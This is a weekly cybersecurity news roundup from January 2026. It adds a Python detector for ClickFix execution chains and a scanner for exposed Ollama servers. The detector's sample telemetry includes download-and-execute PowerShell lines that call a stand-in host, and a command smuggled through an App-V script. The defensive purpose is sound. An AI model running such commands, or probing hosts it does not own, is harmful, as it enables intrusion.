Friday Wrap Up: 30 January 2026
Another week, another avalanche of cyber chaos! From dating apps getting breached (swipe left on that security posture) to VS Code extensions with 1.5 million installs quietly shipping developers' source code to someone else's servers, it’s been a wild ride.
This week’s highlights: ShinyHunters went on a shopping spree, North Korean hackers are forming splinter groups like a K-pop band, and apparently 175,000 AI servers are just... out there... exposed. Also, half your employees are using shadow AI tools, and your C-suite is leading the charge.
Check out the full breakdown for all the gory details, zero-days, and infrastructure takedowns that made this week memorable (for all the wrong reasons).
#CyberThreats #InfoSecCommunity #ThreatIntelligence #Malware #DataBreach #Ransomware #FWU #fridaywrapup
Major Cyberattacks & Incidents
This week saw multiple high-profile breaches spanning dating apps to business intelligence platforms.
💔 Dating apps Match, Hinge, and OkCupid, along with Panera Bread, were breached by the ShinyHunters data-extortion group, exposing millions of customer records, with the type of data exposed varying by service. (Published on 30-Jan-2026, Malwarebytes). Read More
📊 Crunchbase confirmed a data breach after ShinyHunters’ hacking campaign targeted multiple platforms including SoundCloud and Betterment, compromising business intelligence data. (Published on 26-Jan-2026, SecurityWeek). Read More
🎣 ShinyHunters expanded operations to target over 100 organizations using vishing tactics and fake login pages to bypass SSO security and steal corporate data. (Published on 27-Jan-2026, Hackread). Read More
Malware & Vulnerabilities
Attackers deployed sophisticated malware campaigns across multiple platforms, from developer tools to mobile apps.
💻 Two malicious Visual Studio Code AI extensions with 1.5 million combined installs masqueraded as coding assistants while secretly exfiltrating developer source code to China-based servers. (Published on 26-Jan-2026, The Hacker News). Read More
🖱️ ClickFix attacks evolved, pairing fake CAPTCHAs with a signed Microsoft App-V script to distribute the Amatera infostealer; because the execution chain runs through a Microsoft-signed component, detections keyed on unsigned droppers never fire. (Published on 27-Jan-2026, The Hacker News). Read More
🏧 Federal authorities charged 31 additional suspects linked to ATM jackpotting operations allegedly orchestrated by Venezuelan gang Tren de Aragua using specialized malware. (Published on 27-Jan-2026, BleepingComputer). Read More
🍎 Mac users face increased risk as malicious Google Ads direct searches for legitimate software to fake Mac Cleaner pages distributing malware. (Published on 29-Jan-2026, Hackread). Read More
📱 Arsink spyware spread across 143 countries by disguising itself as WhatsApp, YouTube, Instagram, and TikTok, targeting Android users in another widespread mobile malware campaign. (Published on 30-Jan-2026, Hackread). Read More
🌐 Researchers discovered malicious Chrome extensions hijacking affiliate links, stealing data, and collecting OpenAI ChatGPT authentication tokens, including a fake Amazon Ads Blocker. (Published on 30-Jan-2026, The Hacker News). Read More
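The ClickFix item above is the one on this list that turns directly into detection logic: the lure tells the victim to paste a command into the Run dialog, so the telltale is a shell spawned under explorer.exe with hidden-window or download flags, and the signed App-V component gives a second, separate signal. The following is an added example, not code from the original post or from the cited article. It assumes a process-creation log of one JSON object per line with parent_image, image and command_line fields (roughly what Sysmon Event ID 1 or an EDR process-start event carries); the sample events are constructed. The page does not name which signed App-V script the campaign used, so the second rule targets SyncAppvPublishingServer.vbs, the well-known Microsoft-signed App-V script that passes its argument to PowerShell, as a stand-in for that behaviour.

```python
"""Detect ClickFix-style execution chains in process-creation telemetry.

Added example (not code from the original post or the cited article).
Hypothetical assumptions: the log format (one JSON object per line with
parent_image / image / command_line, as in Sysmon Event ID 1) and the
constructed sample events below. The page does not name the signed App-V
script the campaign abused; SyncAppvPublishingServer.vbs is used here as
the known Microsoft-signed App-V LOLBin that executes PowerShell passed to it.
"""
import json
import re
from typing import Iterable

# ClickFix lures have the victim paste into Win+R; the Run dialog's parent is explorer.exe.
PASTE_PARENTS = {"explorer.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# PowerShell switches that hide the window, drop the profile, bypass policy or take encoded input.
HIDDEN_FLAGS = re.compile(r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|ep\s+bypass|e(?:nc(?:odedcommand)?)?\s)")
# Anything that pulls a second stage from the network.
REMOTE_FETCH = re.compile(r"(?i)\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|curl|downloadstring|bitsadmin)\b|https?://")
APPV_LOLBIN = re.compile(r"(?i)syncappvpublishingserver\.vbs")
# The script hands its argument to PowerShell; a ';' or '|' after the first token smuggles a command.
APPV_INJECT = re.compile(r"syncappvpublishingserver\.vbs\"?\s+\"?[^\";|]*[;|]", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of the rules this event matches (empty list = benign)."""
    parent = basename(event.get("parent_image", ""))
    image = basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    hits = []
    if parent in PASTE_PARENTS and image in SHELL_IMAGES and (HIDDEN_FLAGS.search(cmd) or REMOTE_FETCH.search(cmd)):
        hits.append("clickfix_run_dialog_shell")
    if APPV_LOLBIN.search(cmd) and APPV_INJECT.search(cmd):
        hits.append("appv_lolbin_command_injection")
    return hits


def scan(lines: Iterable[str]) -> list[dict]:
    """Run every rule over a stream of JSON-lines events and collect the matches."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        rules = evaluate(ev)
        if rules:
            findings.append({"pid": ev.get("pid"), "image": basename(ev["image"]), "rules": rules})
    return findings


# Constructed sample telemetry: two malicious chains, one benign PowerShell use, one benign App-V sync.
SAMPLE_EVENTS = r"""
{"pid": 4120, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell -w hidden -ep bypass -c \"iwr http://198.51.100.7/c.txt | iex\""}
{"pid": 4188, "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\wscript.exe", "command_line": "wscript C:\\Windows\\System32\\SyncAppvPublishingServer.vbs \"n; Start-Process powershell -ArgumentList '-w hidden -c iwr http://198.51.100.7/a.ps1 | iex'\""}
{"pid": 5002, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell Get-Process"}
{"pid": 5310, "parent_image": "C:\\Windows\\System32\\svchost.exe", "image": "C:\\Windows\\System32\\wscript.exe", "command_line": "wscript C:\\Windows\\System32\\SyncAppvPublishingServer.vbs \"n\""}
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS.splitlines()):
        print(finding)
```

The two rules are deliberately independent: the first fires on the victim-side paste regardless of what the payload is, the second fires on the LOLBin misuse regardless of how the command reached the host, and the legitimate App-V publishing sync (the last sample event) matches neither.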
Critical Vulnerabilities & Zero-Days
Critical security flaws and exploited vulnerabilities demand immediate attention from security teams.
⚠️ Ivanti disclosed two critical vulnerabilities in Endpoint Manager Mobile (CVE-2026-1281 and CVE-2026-1340) actively exploited in zero-day attacks against enterprise systems. (Published on 29-Jan-2026, BleepingComputer). Read More
📡 Nearly 800,000 Telnet servers remain reachable from the internet as threat actors exploit a critical authentication bypass in the GNU InetUtils telnetd server; patching aside, Telnet carries credentials in cleartext and should not be internet-facing at all. (Published on 26-Jan-2026, BleepingComputer). Read More
🔓 A critical sandbox escape in Grist-Core lets an attacker achieve remote code execution through a malicious spreadsheet formula, a reminder that a Pyodide-based formula sandbox is a trust boundary that has to be hardened like any other. (Published on 27-Jan-2026, Infosecurity). Read More
Espionage & Data Extraction
State-sponsored threat actors continue evolving their tactics and operational structures.
🐉 Chinese espionage group Mustang Panda upgraded its CoolClient backdoor to steal browser login credentials and monitor clipboard activity in targeted surveillance operations. (Published on 27-Jan-2026, BleepingComputer). Read More
🇰🇵 Long-running North Korean threat group with Lazarus lineage has split into three distinct operations focused on espionage and cryptocurrency theft, according to CrowdStrike research. (Published on 29-Jan-2026, CyberScoop). Read More
Infrastructure & Operations
Google disrupted a massive malicious proxy network affecting millions of devices globally.
🛡️ Google disrupted IPIDEA proxy network, one of the largest residential proxy operations that enrolled devices through SDKs for mobile and desktop applications. (Published on 29-Jan-2026, SecurityWeek). Read More
🌍 Google’s action removed millions of enrolled devices from IPIDEA’s infrastructure but did not dismantle the network entirely, highlighting how hard it is to take down residential proxy operations for good. (Published on 30-Jan-2026, CyberScoop). Read More
AI & Policy
AI security concerns expand as organizations grapple with exposed infrastructure and shadow AI adoption.
🤖 An investigation uncovered 175,000 publicly accessible Ollama AI servers across 130 countries, most of them running outside managed infrastructure; Ollama ships with no authentication of its own, so an exposed instance serves its models, and whatever prompts and data are sent to them, to anyone who can reach the port. (Published on 29-Jan-2026, The Hacker News). Read More
👥 Nearly half of employees use unsanctioned AI tools, with 69% of executives prioritizing speed over security as shadow AI proliferates across enterprises. (Published on 30-Jan-2026, CSO Online). Read More
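Finding your own contribution to that 175,000 is a simple inventory check, since an unauthenticated Ollama instance identifies itself on two well-known endpoints. The following is an added example, not code from the original post or from the cited investigation. The facts it relies on are that Ollama listens on TCP 11434 by default, answers GET / with the text "Ollama is running", and lists its models at GET /api/tags without authentication of its own; the host addresses, the canned responses and the verdict labels are constructed for the demo, and the fetcher is injectable so the same logic can be pointed at a real address range.

```python
"""Inventory check for unauthenticated Ollama endpoints.

Added example, not code from the original post or from the cited report.
Facts relied on: Ollama listens on TCP 11434 by default, answers GET /
with "Ollama is running", and lists models at GET /api/tags with no
authentication of its own. The host list, canned responses and verdict
names are constructed for this demo (hypothetical addresses).
"""
import json
import urllib.error
import urllib.request
from typing import Callable, Optional

Response = Optional[tuple[int, str]]      # (HTTP status, body) or None if the host is unreachable
Fetcher = Callable[[str], Response]


def http_fetch(url: str, timeout: float = 3.0) -> Response:
    """Live fetcher for real scans: HTTP error codes are returned, network errors become None."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read(4096).decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return None


def classify(root: Response, tags: Response) -> dict:
    """Verdict from the two probes: is this Ollama, and does it hand out its model list to anyone?"""
    if root is None:
        return {"status": "closed", "models": []}
    if root[0] != 200 or "ollama is running" not in root[1].lower():
        return {"status": "other_service", "models": []}
    if tags is None or tags[0] != 200:
        # Something in front of the API (a reverse proxy, for instance) is refusing the call.
        return {"status": "ollama_api_restricted", "models": []}
    try:
        names = [m["name"] for m in json.loads(tags[1]).get("models", [])]
    except (ValueError, KeyError, TypeError, AttributeError):
        names = []
    return {"status": "ollama_unauthenticated", "models": names}


def probe(host: str, port: int = 11434, fetch: Fetcher = http_fetch) -> dict:
    base = f"http://{host}:{port}"
    verdict = classify(fetch(base + "/"), fetch(base + "/api/tags"))
    verdict["host"] = host
    return verdict


def audit(hosts: list[str], fetch: Fetcher = http_fetch) -> list[dict]:
    return [probe(h, fetch=fetch) for h in hosts]


# Constructed responses standing in for four lab hosts (hypothetical addresses):
# .5 is wide open, .6 sits behind a proxy that wants credentials, .7 is some other
# web service on the same port, .8 has nothing listening (no entries -> None).
CANNED = {
    "http://10.0.0.5:11434/": (200, "Ollama is running"),
    "http://10.0.0.5:11434/api/tags": (200, json.dumps({"models": [{"name": "llama3:8b"}, {"name": "mistral:7b"}]})),
    "http://10.0.0.6:11434/": (200, "Ollama is running"),
    "http://10.0.0.6:11434/api/tags": (401, "authentication required"),
    "http://10.0.0.7:11434/": (200, "<html>some other service</html>"),
}


def canned_fetch(url: str) -> Response:
    return CANNED.get(url)


if __name__ == "__main__":
    for verdict in audit(["10.0.0.5", "10.0.0.6", "10.0.0.7", "10.0.0.8"], fetch=canned_fetch):
        print(verdict)
```

Run it with the default http_fetch against your own ranges (from outside the network, since the point is external reachability). For anything that comes back ollama_unauthenticated, the fix is to leave OLLAMA_HOST at its default loopback binding, or to front the port with a reverse proxy that enforces authentication, rather than to expose the API as-is.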
Cybersecurity Policy & Industry
Stakeholders collaborate on voluntary frameworks to address emerging security challenges.
🤝 Industry leaders, government agencies, and nonprofits held weekend discussions advancing voluntary rules for commercial hacking tools under the Pall Mall Process framework. (Published on 26-Jan-2026, CyberScoop). Read More
Social Engineering & Phishing
Attackers continue exploiting trusted platforms for credential theft.
📧 Scammers abused Microsoft Teams invitations to send 12,866 fake billing-notice emails that reached approximately 6,135 users in a callback (phone-based) phishing campaign. (Published on 26-Jan-2026, Hackread). Read More
Stay informed and secure in the tech and cybersecurity world. Have a great weekend, and remember to patch and protect your systems!